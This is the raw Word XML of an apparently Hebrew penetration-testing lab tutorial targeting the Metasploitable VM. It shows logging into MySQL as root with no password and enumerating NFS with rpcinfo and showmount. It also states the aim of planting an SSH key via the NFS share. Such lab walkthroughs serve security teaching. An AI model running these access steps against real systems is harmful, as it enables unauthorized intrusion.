    </w:p>
    <w:p w14:paraId="1BF45560" w14:textId="3DC90557" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00C04EBA" w:rsidP="00C04EB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lastRenderedPageBreak/>
        <w:t>ואפשר לראות שנקבל הרבה מאוד מידע לגבי החשבונות שנמצאים במערכת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0E318" w14:textId="5228D8D1" w:rsidR="00C04EBA" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00C04EBA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ננסה עכשיו להתחבר דרך ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">kali 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ישירות לשרת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mysql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של המכונה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04129AB4" w14:textId="0DF8FCC7" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00C04EBA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הפקודה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mysql -u root -p -h 192.168.1.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24060ED9" w14:textId="631D4753" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>-u- user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754621CD" w14:textId="76919E53" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>-p- password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73C8B8" w14:textId="6D16CD95" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"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t>-h- host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED9B402" w14:textId="6144A700" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3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*רק מזכיר שאין סיסמא ל</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mysql </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C011C84" w14:textId="0095E2E2" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl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3306A455" wp14:editId="21C7946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629400" cy="2127575"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone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1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D9DF2" w14:textId="0C054F97" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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42CB0336" w14:textId="014700AB" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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1BF14FA1" w14:textId="13888D1D" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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789A444C" w14:textId="513B06FD" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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60880561" w14:textId="5D434289" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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785C7BF9" w14:textId="0F0D097A" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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02315747" w14:textId="5EFA4F94" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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36F0D313" w14:textId="4FDE5F23" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="00B346BA" w:rsidP="007214E0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4F4E9AF2" wp14:editId="587F4318">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-419100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2628900" cy="1767840"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapNone/>
            <wp:docPr id="60" name="תמונה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4D3" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עכשיו שאנחנו בתוך המערכת ניתן לבצע סוגים </w:t>
      </w:r>
      <w:r w:rsidR="003B08C3" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">שונים </w:t>
      </w:r>
      <w:r w:rsidR="00BA14D3" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>של פעולות</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A112E" w14:textId="39B3DF30" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3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3254D760" wp14:editId="4B36E560">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4503420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>12065</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2552700" cy="2865120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="62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B4C3B9A" wp14:editId="6C8D7EF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331085" cy="1493520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="72" name="תמונה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39763" w14:textId="3555DF69" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470036EC" w14:textId="668D7F51" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C8265C" w14:textId="4607F569" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F495C14" w14:textId="73357327" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58F81E2F" w14:textId="21E52DE2" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3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1ABB90C3" wp14:editId="5401C1F9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>38100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>318135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3215199" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="71" name="תמונה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99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226AD" w14:textId="7C798999" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4110B136" w14:textId="63ACEF42" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073649EF" w14:textId="5D1A2E09" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C5BEC2" w14:textId="2E087932" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BDA73B" w14:textId="0533FFD7" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790A96C6" w14:textId="701DFF68" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49DC1D7C" w14:textId="44F77803" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64C3DBA3" w14:textId="48CDE02B" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1DB74D" w14:textId="180DCB1C" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6435A53F" w14:textId="791144F0" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="268EB056" w14:textId="4B0FA48A" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39074DE5" w14:textId="684427C6" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="007214E0" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B6D21D" w14:textId="7B92BFBF" w:rsidR="007214E0" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pP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</w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>NFS</w:t>
      </w:r>
      <w:r w:rsidR="000B2FCC" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Network File System</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA76D6" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>port 2049</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C5BEF" w14:textId="7FBF0C1A" w:rsidR="00E54172" w:rsidRPr="007D51BF" w:rsidRDefault="00524609" w:rsidP="00E54172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t xml:space="preserve"> NFS</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">היא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מערכת קבצי רשת ה</w:t>
      </w:r>
      <w:r w:rsidR="00687815" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מאפשר</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ת</w:t>
      </w:r>
      <w:r w:rsidR="00687815" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לגשת לקבצים במחשבים מרוחקים כאילו היו מאוחסנים על אותו מחשב בו הלקוח משתמש</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E54172" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4046BE" w14:textId="21F4251D" w:rsidR="00E54172" w:rsidRPr="007D51BF" w:rsidRDefault="00E54172" w:rsidP="00E54172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החולשה בשירות הזה מאפשרת להתחבר למערכת הקבצים באמצעות העתקת מפתח </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh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לקובץ המפתחות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh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של המכונה הנתקפת</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE37AD" w14:textId="0A766EFD" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00415CC6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תחילה נבצע סריקה לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rpc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המותקן ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploitable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כדי להבין איזה שירותים פועלים</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AA157E" w14:textId="66714397" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00415CC6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הפקודה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 xml:space="preserve">rpcinfo -p 192.168.1.157 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D376389" w14:textId="145D1E3C" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00352C58">
      <w:pPr>
        <w:jc w:val="right"/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5C1AC59F" wp14:editId="14D3BD6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575560" cy="3169920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="90" name="תמונה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33D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">מציין את מכונה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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-p</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2278AE94" w14:textId="59C99786" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="448187DC" w14:textId="1A15CBAC" w:rsidR="00BA14D3" w:rsidRPr="007D51BF" w:rsidRDefault="00BA14D3" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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51334240" w14:textId="36817701" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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1FBF2E77" w14:textId="0466618D" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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66B91B4A" w14:textId="6658C125" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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75F68B6B" w14:textId="0E4F860E" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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1BD67612" w14:textId="0D7C3FBF" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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72A6467E" w14:textId="6FEB543E" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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320BD41F" w14:textId="0AD57E02" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00BA14D3">
      <w:pPr>
        <w:jc w:val="right"/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2BCFB1E7" w14:textId="0B90CA46" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00352C58" w:rsidP="00352C58">
      <w:pPr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4CAC9381" w14:textId="77777777" w:rsidR="00C7533D" w:rsidRPr="007D51BF" w:rsidRDefault="00C7533D" w:rsidP="00352C58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264AEB7B" w14:textId="2E4085B4" w:rsidR="00352C58" w:rsidRPr="007D51BF" w:rsidRDefault="00EC0D0A" w:rsidP="00EC0D0A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ונראה שיש מספר תהליכי </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nfs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</w:t>
      </w:r>
      <w:r w:rsidR="0090536E" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>שמאזינים בפורט 2049.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C561EC2" w14:textId="50F12AA5" w:rsidR="00E54172" w:rsidRPr="007D51BF" w:rsidRDefault="00E54172" w:rsidP="00EC0D0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="FF0000"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ניתן למקד את החיפוש בעזרת הוספת הפקודה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| grep nfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A36FFB1" w14:textId="411450D9" w:rsidR="00EC0D0A" w:rsidRPr="007D51BF" w:rsidRDefault="00EC0D0A" w:rsidP="00EC0D0A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כעת נתשאל את המערכת המרוחקת לגבי מידע על מצב השרת ובבעלות איזו הרשאות</w:t>
      </w:r>
      <w:r w:rsidR="00C7533D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> באמצעות הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="00C7533D" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>showmount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E62AF39" w14:textId="77777777" w:rsidR="00EC0D0A" w:rsidRPr="007D51BF" w:rsidRDefault="00EC0D0A" w:rsidP="00EC0D0A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הפקודה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showmount -e 192.168.1.157</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B740E6A" w14:textId="39352B3F" w:rsidR="00EC0D0A" w:rsidRPr="007D51BF" w:rsidRDefault="00EC0D0A" w:rsidP="00C7533D">
      <w:pPr>
        <w:jc w:val="right"/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5E8AFBBE" wp14:editId="49A9589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754192" cy="1005840"/>
